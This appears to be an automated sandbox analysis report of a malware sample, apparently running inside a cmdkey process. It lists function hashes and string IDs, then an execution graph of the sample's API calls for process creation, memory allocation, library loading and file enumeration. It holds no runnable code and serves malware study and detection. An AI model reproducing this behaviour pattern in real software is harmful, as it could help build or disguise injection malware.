                                                  Function 03590EBD Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -$4$F$U
                                                  • API String ID: 0-1244943234
                                                  • Opcode ID: 2b62fc11138981588ae9e7b1dbe716d15377b50071ce5227c4c4fbfea785e92f
                                                  • Instruction ID: 8b2f87a926dc6f6353b4b04ccdd720056c7b9f1af9659be4d7c6e34b4de86a2c
                                                  • Opcode Fuzzy Hash: 2b62fc11138981588ae9e7b1dbe716d15377b50071ce5227c4c4fbfea785e92f
                                                  • Instruction Fuzzy Hash: D43173B5D00209ABEF00DFA4DD41BEE77F8FF44304F044599E904AB280E771AA048BE5
                                                  Function 0357E4A3 Relevance: 5.1, Strings: 4, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @MSJ$@MSJ$WRWF$}
                                                  • API String ID: 0-3893029086
                                                  • Opcode ID: d770e76913523d9a0e6f9e7fb87dacc2061b48b81cf5bb6f09eaf32ca8916fdc
                                                  • Instruction ID: dcb7301be25adcf46c4b68f34f13886692861a9cb1ad2998857e30809c12513c
                                                  • Opcode Fuzzy Hash: d770e76913523d9a0e6f9e7fb87dacc2061b48b81cf5bb6f09eaf32ca8916fdc
                                                  • Instruction Fuzzy Hash: 5931ECB1D443889ACB20CFE5E9842DEFFB1BB04214FA4865CC02A7F641CB365646CF99
                                                  Function 0359232E Relevance: 5.1, Strings: 4, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $e$k$o
                                                  • API String ID: 0-3624523832
                                                  • Opcode ID: 42befa81100a3b777a9cd0e20ce04cc66b03185c562a6bccb102ea01b1ce48b1
                                                  • Instruction ID: 94e63eed40959a2d47f3e5aabefbf073b1eb406ee427db95c539a5b2b908f74f
                                                  • Opcode Fuzzy Hash: 42befa81100a3b777a9cd0e20ce04cc66b03185c562a6bccb102ea01b1ce48b1
                                                  • Instruction Fuzzy Hash: 9611A9B2900208EFDB14CF98DC85ADEFBB5FF44314F08865EE9199B116E7719945CBA0
                                                  Function 0357E4AD Relevance: 5.1, Strings: 4, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @MSJ$@MSJ$WRWF$}
                                                  • API String ID: 0-3893029086
                                                  • Opcode ID: 1b6785570093add07f930220f05d9e21393d54a4e8b0f8950e3b65ea46dd775b
                                                  • Instruction ID: cbb27195f5e885223233f1a7a6dfd58ca0766d97c4c2ea53e7d4c432f421697a
                                                  • Opcode Fuzzy Hash: 1b6785570093add07f930220f05d9e21393d54a4e8b0f8950e3b65ea46dd775b
                                                  • Instruction Fuzzy Hash: 8F21CAB0D442889ACB20CFD5EA842DEFFB1BB04204FA1855CC52A7F601DB365A568F95
                                                  Function 0359233D Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $e$k$o
                                                  • API String ID: 0-3624523832
                                                  • Opcode ID: 74a0c612dd85ffc11efcfafd19d795e4e60962ead217c02992d87c4b88934f2c
                                                  • Instruction ID: ccc887612b8b57c2f7844f08ee58d8b71aa0a69f8aa79a6591412480f053d487
                                                  • Opcode Fuzzy Hash: 74a0c612dd85ffc11efcfafd19d795e4e60962ead217c02992d87c4b88934f2c
                                                  • Instruction Fuzzy Hash: 2501C4B2900308ABDB14DF98D884ADEFBB9FF48304F04865AE9196B201E771A545CBA0
                                                  Function 0357E49F Relevance: 5.0, Strings: 4, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @MSJ$@MSJ$WRWF$}
                                                  • API String ID: 0-3893029086
                                                  • Opcode ID: 6d19f0e0b6106dd2e0fa304ac2787c2f3053dd4dbb73a6ffdbee81285f4efd5a
                                                  • Instruction ID: 62ffbcd3ff8426612cda14b0fa17b64c22443a6127344f50eb8830a25b72e4c2
                                                  • Opcode Fuzzy Hash: 6d19f0e0b6106dd2e0fa304ac2787c2f3053dd4dbb73a6ffdbee81285f4efd5a
                                                  • Instruction Fuzzy Hash: 66110FB1D45288DACF14CFC5E9841DEBFB1FF04614FA48988C11A7F601CB3A5A528F99
                                                  Function 03582D3D Relevance: 5.0, Strings: 4, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "3G$0:$HD$ZI|n
                                                  • API String ID: 0-3571891404
                                                  • Opcode ID: 8b21d6adb2704bcb7510e9a72687f1609da77863edf2c5f4b6906bfa7c850a13
                                                  • Instruction ID: 04a09c5dc8ba3271fe0cf4094f0a4010ea568ca093affe412b7318e2e3c644f3
                                                  • Opcode Fuzzy Hash: 8b21d6adb2704bcb7510e9a72687f1609da77863edf2c5f4b6906bfa7c850a13
                                                  • Instruction Fuzzy Hash: C5F064B1D01328ABEB10EF99D902ADEBB78FF0A300F544048E9513B241E7B04A408BE6
                                                  Function 03582D39 Relevance: 5.0, Strings: 4, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "3G$0:$HD$ZI|n
                                                  • API String ID: 0-3571891404
                                                  • Opcode ID: 1baf609e2e7e62307b4c6765a7af676f0a15956ff22ac2eb8ba13b83bab2f53f
                                                  • Instruction ID: adc0daa88b0a387d9ee792fc2b28b2d75695830e5caaa0895ccf0c1da3beef61
                                                  • Opcode Fuzzy Hash: 1baf609e2e7e62307b4c6765a7af676f0a15956ff22ac2eb8ba13b83bab2f53f
                                                  • Instruction Fuzzy Hash: 6F0169B1E51229AFEB10EF89D9419DEBB78FF1A350F544148E9517B242D7B04A008FE6
                                                  Function 0357E44D Relevance: 5.0, Strings: 4, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !$F[HQ$GM@U$S
                                                  • API String ID: 0-2185307660
                                                  • Opcode ID: aad7c3a1c88034455b0e6ab1c39a59cecf2009c13dde3b95f7a6a18687442a4f
                                                  • Instruction ID: ebd23aaf21ae7162527e9ccae6db18371f3f698b947cdb176a38ed3a0f5934a3
                                                  • Opcode Fuzzy Hash: aad7c3a1c88034455b0e6ab1c39a59cecf2009c13dde3b95f7a6a18687442a4f
                                                  • Instruction Fuzzy Hash: 23F06DB1D1024C6BDF00DFA8DD056EEFBB5BB40300F6045A8C958AF251E7759B40CB96

                                                  Execution Graph

                                                  Execution Coverage:3.3%
                                                  Dynamic/Decrypted Code Coverage:4.1%
                                                  Signature Coverage:0.6%
                                                  Total number of Nodes:467
                                                  Total number of Limit Nodes:74
                                                  execution_graph 73914 a47425 73915 a473b6 73914->73915 73916 a4742a 73914->73916 73918 a473f1 73915->73918 73950 a46620 NtClose LdrInitializeThunk LdrInitializeThunk 73915->73950 73922 a474a2 73916->73922 73923 a4b3b0 73916->73923 73919 a473ce 73919->73918 73951 a467f0 NtClose LdrInitializeThunk LdrInitializeThunk 73919->73951 73924 a4b3d6 73923->73924 73925 a4b5f9 73924->73925 73952 a59900 73924->73952 73925->73922 73927 a4b44c 73927->73925 73955 a5c8c0 73927->73955 73929 a4b46b 73929->73925 73930 a4b53a 73929->73930 73961 a58b50 73929->73961 73932 a45c10 LdrInitializeThunk 73930->73932 73942 a4b555 73930->73942 73932->73942 73934 a4b522 73968 a48220 73934->73968 73936 a4b4d6 73936->73925 73936->73934 73937 a4b504 73936->73937 73965 a45c10 73936->73965 73972 a54910 LdrInitializeThunk 73937->73972 73938 a4b5e1 73940 a48220 LdrInitializeThunk 73938->73940 73944 a4b5ef 73940->73944 73942->73938 73973 a586c0 73942->73973 73944->73922 73946 a4b5b8 73978 a58770 73946->73978 73948 a4b5d2 73983 a588d0 73948->73983 73950->73919 73951->73918 73953 a5991d 73952->73953 73954 a5992e CreateProcessInternalW 73953->73954 73954->73927 73956 a5c830 73955->73956 73957 a5c88d 73956->73957 73988 a5b6b0 73956->73988 73957->73929 73959 a5c86a 73991 a5b5d0 73959->73991 73962 a58b6d 73961->73962 74000 3452b2a 73962->74000 73963 a4b4cd 73963->73930 73963->73936 73967 a45c4e 73965->73967 74003 a58d20 73965->74003 73967->73937 73969 a48233 73968->73969 74009 a58a50 73969->74009 73971 a4825e 73971->73922 73972->73934 73974 a58740 73973->73974 73976 a586ee 73973->73976 74015 34538d0 LdrInitializeThunk 73974->74015 73975 a58765 73975->73946 73976->73946 73979 a587ed 73978->73979 73980 a5879b 73978->73980 74016 3454260 LdrInitializeThunk 73979->74016 73980->73948 73981 a58812 73981->73948 73984 a5894d 73983->73984 73985 a588fb 73983->73985 74017 3452ed0 LdrInitializeThunk 73984->74017 73985->73938 73986 a58972 73986->73938 73994 a59820 73988->73994 73990 a5b6cb 73990->73959 73997 a59870 73991->73997 73993 a5b5e9 73993->73957 73995 a5983d 73994->73995 73996 a5984e RtlAllocateHeap 73995->73996 73996->73990 73998 a5988a 73997->73998 73999 a5989b RtlFreeHeap 73998->73999 73999->73993 74001 3452b3f LdrInitializeThunk 74000->74001 74002 3452b31 74000->74002 74001->73963 74002->73963 74004 a58d52 74003->74004 74005 a58dd4 74003->74005 74004->73967 74008 3452c30 LdrInitializeThunk 74005->74008 74006 a58e19 74006->73967 74008->74006 74010 a58ace 74009->74010 74012 a58a7b 74009->74012 74014 3452cf0 LdrInitializeThunk 74010->74014 74011 a58af3 74011->73971 74012->73971 74014->74011 74015->73975 74016->73981 74017->73986 74018 a3b620 74021 a5b540 74018->74021 74020 a3cc91 74024 a59670 74021->74024 74023 a5b571 74023->74020 74025 a59705 74024->74025 74027 a5969b 74024->74027 74026 a5971b NtAllocateVirtualMemory 74025->74026 74026->74023 74027->74023 74028 a46e60 74029 a46e8a 74028->74029 74032 a48050 74029->74032 74031 a46eb4 74033 a4806d 74032->74033 74039 a58c40 74033->74039 74035 a480bd 74036 a480c4 74035->74036 74037 a58d20 LdrInitializeThunk 74035->74037 74036->74031 74038 a480ed 74037->74038 74038->74031 74040 a58cde 74039->74040 74042 a58c6e 74039->74042 74044 3452e50 LdrInitializeThunk 74040->74044 74041 a58d17 74041->74035 74042->74035 74044->74041 74045 a40e60 74046 a40e7a 74045->74046 74051 a44620 74046->74051 74048 a40e98 74049 a40ecc PostThreadMessageW 74048->74049 74050 a40edd 74048->74050 74049->74050 74052 a44644 74051->74052 74053 a4464b 74052->74053 74054 a44680 LdrLoadDll 74052->74054 74053->74048 74054->74053 74062 a59460 74063 a594d7 74062->74063 74065 a5948b 74062->74065 74064 a594ed NtDeleteFile 74063->74064 74071 a50eee 74072 a50ecc 74071->74072 74073 a50f0f 74072->74073 74076 a464a0 74072->74076 74077 a464c5 74076->74077 74080 a58e70 74077->74080 74081 a58e8a 74080->74081 74084 3452b80 LdrInitializeThunk 74081->74084 74082 a46539 74084->74082 74085 a39af0 74086 a39aff 74085->74086 74087 a39b40 74086->74087 74088 a39b2d CreateThread 74086->74088 74089 a4f970 74090 a4f9d4 74089->74090 74118 a46390 74090->74118 74092 a4fb0e 74093 a4fb07 74093->74092 74094 a464a0 LdrInitializeThunk 74093->74094 74096 a4fb8a 74094->74096 74095 a4fcb3 74096->74095 74097 a4fcc2 74096->74097 74125 a4f750 74096->74125 74098 a59500 NtClose 74097->74098 74100 a4fccc 74098->74100 74101 a4fbc6 74101->74097 74102 a4fbd1 74101->74102 74103 a5b6b0 RtlAllocateHeap 74102->74103 74104 a4fbfa 74103->74104 74105 a4fc03 74104->74105 74106 a4fc19 74104->74106 74107 a59500 NtClose 74105->74107 74134 a4f640 CoInitialize 74106->74134 74109 a4fc0d 74107->74109 74110 a4fc27 74137 a58fc0 74110->74137 74112 a4fca2 74141 a59500 74112->74141 74114 a4fcac 74116 a5b5d0 RtlFreeHeap 74114->74116 74115 a4fc45 74115->74112 74117 a58fc0 LdrInitializeThunk 74115->74117 74116->74095 74117->74115 74119 a463c3 74118->74119 74120 a463e7 74119->74120 74144 a59070 74119->74144 74120->74093 74122 a4640a 74122->74120 74123 a59500 NtClose 74122->74123 74124 a4648a 74123->74124 74124->74093 74126 a4f76c 74125->74126 74127 a44620 LdrLoadDll 74126->74127 74129 a4f78a 74127->74129 74128 a4f793 74128->74101 74129->74128 74130 a44620 LdrLoadDll 74129->74130 74131 a4f85e 74130->74131 74132 a44620 LdrLoadDll 74131->74132 74133 a4f8b8 74131->74133 74132->74133 74133->74101 74135 a4f6a5 74134->74135 74136 a4f73b CoUninitialize 74135->74136 74136->74110 74138 a58fdd 74137->74138 74149 3452ac0 LdrInitializeThunk 74138->74149 74139 a5900d 74139->74115 74142 a5951a 74141->74142 74143 a5952b NtClose 74142->74143 74143->74114 74145 a5908d 74144->74145 74148 3452bc0 LdrInitializeThunk 74145->74148 74146 a590b9 74146->74122 74148->74146 74149->74139 74151 a50270 74152 a5028d 74151->74152 74153 a44620 LdrLoadDll 74152->74153 74154 a502ab 74153->74154 74155 a5c7f0 74156 a5b5d0 RtlFreeHeap 74155->74156 74157 a5c805 74156->74157 74158 a55970 74159 a559d2 74158->74159 74160 a559df 74159->74160 74162 a474b0 74159->74162 74163 a47477 74162->74163 74164 a474a2 74163->74164 74165 a4b3b0 9 API calls 74163->74165 74164->74160 74165->74164 74166 a49d3f 74167 a49d56 74166->74167 74168 a49d5b 74166->74168 74169 a5b5d0 RtlFreeHeap 74168->74169 74170 a49d8d 74168->74170 74169->74170 74171 a42838 74172 a4284c 74171->74172 74173 a46390 2 API calls 74172->74173 74174 a42863 74173->74174 74175 a48944 74177 a48954 74175->74177 74176 a48904 74177->74176 74179 a47080 LdrInitializeThunk LdrInitializeThunk 74177->74179 74179->74176 74180 a4ae80 74185 a4ab90 74180->74185 74182 a4ae8d 74199 a4a800 74182->74199 74184 a4aea9 74186 a4abb5 74185->74186 74210 a48490 74186->74210 74189 a4ad03 74189->74182 74191 a4ad1a 74191->74182 74192 a4ad11 74192->74191 74194 a4ae07 74192->74194 74229 a4a250 74192->74229 74196 a4ae6a 74194->74196 74238 a4a5c0 74194->74238 74197 a5b5d0 RtlFreeHeap 74196->74197 74198 a4ae71 74197->74198 74198->74182 74200 a4a816 74199->74200 74207 a4a821 74199->74207 74201 a5b6b0 RtlAllocateHeap 74200->74201 74201->74207 74202 a4a848 74202->74184 74203 a48490 GetFileAttributesW 74203->74207 74204 a4ab62 74205 a4ab7b 74204->74205 74206 a5b5d0 RtlFreeHeap 74204->74206 74205->74184 74206->74205 74207->74202 74207->74203 74207->74204 74208 a4a250 RtlFreeHeap 74207->74208 74209 a4a5c0 RtlFreeHeap 74207->74209 74208->74207 74209->74207 74211 a484b1 74210->74211 74212 a484b8 GetFileAttributesW 74211->74212 74213 a484c3 74211->74213 74212->74213 74213->74189 74214 a534f0 74213->74214 74215 a534fe 74214->74215 74216 a53505 74214->74216 74215->74192 74217 a44620 LdrLoadDll 74216->74217 74218 a5353a 74217->74218 74219 a53549 74218->74219 74242 a52fb0 LdrLoadDll 74218->74242 74221 a5b6b0 RtlAllocateHeap 74219->74221 74225 a536f4 74219->74225 74222 a53562 74221->74222 74223 a536ea 74222->74223 74222->74225 74226 a5357e 74222->74226 74224 a5b5d0 RtlFreeHeap 74223->74224 74223->74225 74224->74225 74225->74192 74226->74225 74227 a5b5d0 RtlFreeHeap 74226->74227 74228 a536de 74227->74228 74228->74192 74230 a4a276 74229->74230 74243 a4dc80 74230->74243 74232 a4a2e8 74234 a4a470 74232->74234 74236 a4a306 74232->74236 74233 a4a455 74233->74192 74234->74233 74235 a4a110 RtlFreeHeap 74234->74235 74235->74234 74236->74233 74248 a4a110 74236->74248 74239 a4a5e6 74238->74239 74240 a4dc80 RtlFreeHeap 74239->74240 74241 a4a66d 74240->74241 74241->74194 74242->74219 74245 a4dca4 74243->74245 74244 a4dcb1 74244->74232 74245->74244 74246 a5b5d0 RtlFreeHeap 74245->74246 74247 a4dcf4 74246->74247 74247->74232 74249 a4a12d 74248->74249 74252 a4dd10 74249->74252 74251 a4a233 74251->74236 74254 a4dd34 74252->74254 74253 a4ddde 74253->74251 74254->74253 74255 a5b5d0 RtlFreeHeap 74254->74255 74255->74253 74256 a51441 74268 a59370 74256->74268 74258 a51462 74259 a51495 74258->74259 74260 a51480 74258->74260 74262 a59500 NtClose 74259->74262 74261 a59500 NtClose 74260->74261 74263 a51489 74261->74263 74265 a5149e 74262->74265 74264 a514d5 74265->74264 74266 a5b5d0 RtlFreeHeap 74265->74266 74267 a514c9 74266->74267 74269 a59417 74268->74269 74271 a5939b 74268->74271 74270 a5942d NtReadFile 74269->74270 74270->74258 74271->74258 74272 a518c0 74273 a518dc 74272->74273 74274 a51904 74273->74274 74275 a51918 74273->74275 74276 a59500 NtClose 74274->74276 74277 a59500 NtClose 74275->74277 74278 a5190d 74276->74278 74279 a51921 74277->74279 74282 a5b6f0 RtlAllocateHeap 74279->74282 74281 a5192c 74282->74281 74283 a578c0 74284 a57925 74283->74284 74285 a5795c 74284->74285 74288 a4b610 74284->74288 74287 a5793e 74289 a4b5b3 74288->74289 74290 a4b5e1 74288->74290 74291 a4b622 74289->74291 74293 a586c0 LdrInitializeThunk 74289->74293 74292 a48220 LdrInitializeThunk 74290->74292 74291->74287 74295 a4b5ef 74292->74295 74294 a4b5b8 74293->74294 74296 a58770 LdrInitializeThunk 74294->74296 74295->74287 74297 a4b5d2 74296->74297 74298 a588d0 LdrInitializeThunk 74297->74298 74298->74290 74299 a59200 74300 a592ba 74299->74300 74302 a59232 74299->74302 74301 a592d0 NtCreateFile 74300->74301 74303 a56200 74304 a5625a 74303->74304 74306 a56267 74304->74306 74307 a53c10 74304->74307 74308 a5b540 NtAllocateVirtualMemory 74307->74308 74309 a53c51 74308->74309 74310 a44620 LdrLoadDll 74309->74310 74313 a53d5e 74309->74313 74312 a53c97 74310->74312 74311 a53ce0 Sleep 74311->74312 74312->74311 74312->74313 74313->74306 74314 a58980 74315 a58a0f 74314->74315 74317 a589ab 74314->74317 74319 3452e00 LdrInitializeThunk 74315->74319 74316 a58a40 74319->74316 74320 a58b00 74321 a58b1a 74320->74321 74324 3452d10 LdrInitializeThunk 74321->74324 74322 a58b42 74324->74322 74325 a423ce 74326 a423de 74325->74326 74327 a42368 74325->74327 74328 a58b50 LdrInitializeThunk 74327->74328 74329 a42396 74328->74329 74332 a595a0 74329->74332 74331 a423ab 74333 a59632 74332->74333 74335 a595ce 74332->74335 74337 3452da0 LdrInitializeThunk 74333->74337 74334 a59663 74334->74331 74335->74331 74337->74334 74338 a39b50 74339 a39ec2 74338->74339 74340 a3a376 74339->74340 74342 a5b230 74339->74342 74343 a5b256 74342->74343 74348 a34120 74343->74348 74345 a5b262 74346 a5b29e 74345->74346 74351 a55790 74345->74351 74346->74340 74355 a432e0 74348->74355 74350 a3412d 74350->74345 74352 a557f2 74351->74352 74354 a557ff 74352->74354 74366 a41a90 74352->74366 74354->74346 74356 a432fa 74355->74356 74358 a43313 74356->74358 74359 a59f50 74356->74359 74358->74350 74361 a59f6a 74359->74361 74360 a59f99 74360->74358 74361->74360 74362 a58b50 LdrInitializeThunk 74361->74362 74363 a59ff9 74362->74363 74364 a5b5d0 RtlFreeHeap 74363->74364 74365 a5a012 74364->74365 74365->74358 74367 a41ac8 74366->74367 74382 a47fb0 74367->74382 74369 a41ad0 74370 a41db0 74369->74370 74371 a5b6b0 RtlAllocateHeap 74369->74371 74370->74354 74372 a41ae6 74371->74372 74373 a5b6b0 RtlAllocateHeap 74372->74373 74374 a41af7 74373->74374 74375 a5b6b0 RtlAllocateHeap 74374->74375 74376 a41b08 74375->74376 74381 a41ba5 74376->74381 74397 a46af0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 74376->74397 74378 a44620 LdrLoadDll 74379 a41d62 74378->74379 74393 a580d0 74379->74393 74381->74378 74383 a47fdc 74382->74383 74398 a47ea0 74383->74398 74386 a48021 74388 a4803d 74386->74388 74391 a59500 NtClose 74386->74391 74387 a48009 74389 a48014 74387->74389 74390 a59500 NtClose 74387->74390 74388->74369 74389->74369 74390->74389 74392 a48033 74391->74392 74392->74369 74394 a58132 74393->74394 74395 a5813f 74394->74395 74409 a41dc0 74394->74409 74395->74370 74397->74381 74399 a47f96 74398->74399 74400 a47eba 74398->74400 74399->74386 74399->74387 74404 a58bf0 74400->74404 74403 a59500 NtClose 74403->74399 74405 a58c0a 74404->74405 74408 34534e0 LdrInitializeThunk 74405->74408 74406 a47f8a 74406->74403 74408->74406 74411 a41de0 74409->74411 74425 a48280 74409->74425 74418 a42343 74411->74418 74429 a51280 74411->74429 74414 a41ff6 74416 a5c8c0 2 API calls 74414->74416 74415 a41e3e 74415->74418 74433 a5c790 74415->74433 74419 a4200b 74416->74419 74417 a48220 LdrInitializeThunk 74421 a4205b 74417->74421 74418->74395 74419->74421 74438 a40900 74419->74438 74421->74417 74421->74418 74423 a40900 LdrInitializeThunk 74421->74423 74422 a48220 LdrInitializeThunk 74424 a421b0 74422->74424 74423->74421 74424->74421 74424->74422 74426 a4828d 74425->74426 74427 a482b5 74426->74427 74428 a482ae SetErrorMode 74426->74428 74427->74411 74428->74427 74430 a51283 74429->74430 74431 a5b540 NtAllocateVirtualMemory 74430->74431 74432 a512a1 74431->74432 74432->74415 74434 a5c7a6 74433->74434 74435 a5c7a0 74433->74435 74436 a5b6b0 RtlAllocateHeap 74434->74436 74435->74414 74437 a5c7cc 74436->74437 74437->74414 74441 a59790 74438->74441 74442 a597aa 74441->74442 74445 3452b90 LdrInitializeThunk 74442->74445 74443 a40922 74443->74424 74445->74443 74446 a45c90 74447 a48220 LdrInitializeThunk 74446->74447 74448 a45cc0 74447->74448 74450 a45cec 74448->74450 74451 a481a0 74448->74451 74452 a481e4 74451->74452 74457 a48205 74452->74457 74458 a58820 74452->74458 74454 a481f5 74455 a48211 74454->74455 74456 a59500 NtClose 74454->74456 74455->74448 74456->74457 74457->74448 74459 a588a0 74458->74459 74461 a5884e 74458->74461 74463 3454570 LdrInitializeThunk 74459->74463 74460 a588c5 74460->74454 74461->74454 74463->74460 74464 a4c710 74466 a4c739 74464->74466 74465 a4c83d 74466->74465 74467 a4c7e3 FindFirstFileW 74466->74467 74467->74465 74469 a4c7fe 74467->74469 74468 a4c824 FindNextFileW 74468->74469 74470 a4c836 FindClose 74468->74470 74469->74468 74470->74465 74471 34529f0 LdrInitializeThunk 74472 a51c50 74477 a51c69 74472->74477 74473 a51cf9 74474 a51cb4 74475 a5b5d0 RtlFreeHeap 74474->74475 74476 a51cc4 74475->74476 74477->74473 74477->74474 74478 a51cf4 74477->74478 74479 a5b5d0 RtlFreeHeap 74478->74479 74479->74473 74485 a431d3 74486 a47ea0 2 API calls 74485->74486 74487 a431e3 74486->74487 74488 a431ff 74487->74488 74489 a59500 NtClose 74487->74489 74489->74488

                                                  Executed Functions

                                                  Function 00A39B50 Relevance: 26.7, Strings: 21, Instructions: 438COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 26 a39b50-a39ec0 27 a39ec2-a39ecb 26->27 28 a39ed1-a39edb 26->28 27->28 29 a39f2f-a39f39 28->29 30 a39edd-a39f2d 28->30 31 a39f4a-a39f56 29->31 30->27 32 a39f58-a39f6b 31->32 33 a39f6d-a39f74 31->33 32->31 35 a39f76-a39f99 33->35 36 a39f9b-a39fb3 33->36 35->33 37 a39fc4-a39fd0 36->37 38 a39fd2-a39fe5 37->38 39 a39fe7-a39ff1 37->39 38->37 41 a3a002-a3a00e 39->41 42 a3a010-a3a019 41->42 43 a3a01b 41->43 42->41 45 a3a022-a3a026 43->45 46 a3a054-a3a05e 45->46 47 a3a028-a3a052 45->47 48 a3a06f-a3a07b 46->48 47->45 49 a3a091-a3a09a 48->49 50 a3a07d-a3a08f 48->50 51 a3a0a0-a3a0aa 49->51 52 a3a2aa-a3a2b1 49->52 50->48 54 a3a0bb-a3a0c4 51->54 55 a3a2b3-a3a2d6 52->55 56 a3a2d8-a3a2df 52->56 57 a3a0c6-a3a0d9 54->57 58 a3a0db-a3a0e5 54->58 55->52 59 a3a3d7-a3a3e1 56->59 60 a3a2e5-a3a2fe 56->60 57->54 62 a3a0f6-a3a102 58->62 64 a3a3f2-a3a3fe 59->64 60->60 63 a3a300-a3a30a 60->63 65 a3a115-a3a118 62->65 66 a3a104-a3a113 62->66 67 a3a31b-a3a327 63->67 68 a3a400-a3a409 64->68 69 a3a416-a3a420 64->69 71 a3a11e-a3a122 65->71 66->62 72 a3a329-a3a339 67->72 73 a3a34c-a3a355 67->73 74 a3a414 68->74 75 a3a40b-a3a411 68->75 76 a3a145-a3a14f 71->76 77 a3a124-a3a143 71->77 78 a3a33b-a3a344 72->78 79 a3a34a 72->79 80 a3a371 call a5b230 73->80 81 a3a357-a3a36f 73->81 74->64 75->74 83 a3a160-a3a169 76->83 77->71 78->79 79->67 86 a3a376-a3a380 80->86 81->73 87 a3a180-a3a18f 83->87 88 a3a16b-a3a17e 83->88 91 a3a391-a3a39a 86->91 89 a3a191-a3a195 87->89 90 a3a1f0-a3a1fa 87->90 88->83 93 a3a1c3-a3a1ca 89->93 94 a3a197-a3a1c1 89->94 97 a3a20b-a3a214 90->97 95 a3a3ab-a3a3b2 91->95 96 a3a39c-a3a3a9 91->96 98 a3a1eb 93->98 99 a3a1cc-a3a1e9 93->99 94->89 95->59 101 a3a3b4-a3a3ca 95->101 96->91 102 a3a216-a3a228 97->102 103 a3a22a-a3a23e 97->103 98->52 99->93 104 a3a3d5 101->104 105 a3a3cc-a3a3d2 101->105 102->97 107 a3a24f-a3a25b 103->107 104->95 105->104 108 a3a279-a3a27d 107->108 109 a3a25d-a3a269 107->109 110 a3a2a5 108->110 111 a3a27f-a3a2a3 108->111 112 a3a277 109->112 113 a3a26b-a3a271 109->113 110->49 111->108 112->107 113->112
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #W$)/$,$8$8$?ypG$B$CI$N$Vw$Yg$ZA$^^$_$a$cW$l\$pG$wN${p$q
                                                  • API String ID: 0-914735403
                                                  • Opcode ID: 27aad659b676bfce25ed300dbfebfbd60364c1ec14c9cd4ab922d91898041615
                                                  • Instruction ID: 2742faf69a4257882b372e9f0eb363904c2ee0b2e26c590dec1f424a6aae21ff
                                                  • Opcode Fuzzy Hash: 27aad659b676bfce25ed300dbfebfbd60364c1ec14c9cd4ab922d91898041615
                                                  • Instruction Fuzzy Hash: 46328EB0D05228CBEB68CF84C994BDDBBB1BB54308F2081DAD44D6B290CBB55AC9DF55
